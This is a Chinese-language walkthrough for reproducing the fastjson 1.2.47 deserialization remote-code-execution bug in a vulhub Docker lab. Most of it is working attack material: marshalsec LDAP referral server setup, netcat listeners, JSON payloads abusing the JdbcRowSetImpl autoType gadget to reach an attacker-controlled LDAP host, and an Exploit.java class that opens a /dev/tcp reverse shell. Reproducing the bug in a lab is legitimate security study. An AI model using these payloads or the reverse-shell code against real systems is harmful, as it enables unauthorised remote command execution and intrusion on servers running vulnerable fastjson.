fastjson1.2.47反序列化漏洞复现
环境搭建
启动docker
systemctl start docker
下载环境
git clone https://github.com/vulhub/vulhub.git
生成docker环境
cd vulhub/fastjson/1.2.47-rce/
docker-compose up -d
docker ps
查看到docker容器运行
漏洞检测
区分 Fastjson 和 Jackson
{"name":"S", "age":21}
{"name":"S", "age":21,"agsbdkjada__ss_d":123}
这两个fastjson都不会报错,而jackson会报错,因为Jackson 因为强制 key 与 javabean 属性对齐,只能少不能多 key,所以会报错。
漏洞复现
kali下切换java版本
update-alternatives --config java
java -version
update-alternatives --config javac
javac -version
maven编译
git clone --depth=1 https://github.com.cnpmjs.org/mbechler/marshalsec.git
cd marshalsec/
mvn clean package -DskipTests
cd target/
kali监听测试外联
ifconfig
nc -lvvp 7777
在burp中把json数据包替换,其中的ip替换为kali的ip
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://IP:7777/Exploit","autoCommit":true}}}
编译Exploit.java
ip端口要做修改成kali的
import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
javac Exploit.java
准备LDAP服务和Web服务
ip修改为本地ip
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://IP/#Exploit
python3 -m http.server 80 或者 python -m SimpleHTTPServer 80
监听shell
nc -lvvp 2345
发送数据包
ip修改为kali的ip之后用burp发送
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ip:1389/Exploit","autoCommit":true}}}
参考文章
https://blog.spoock.com/2018/11/07/java-reverse-shell/
https://www.cnblogs.com/escape-w/p/11322845.html
https://github.com/CaijiOrz/fastjson-1.2.47-RCE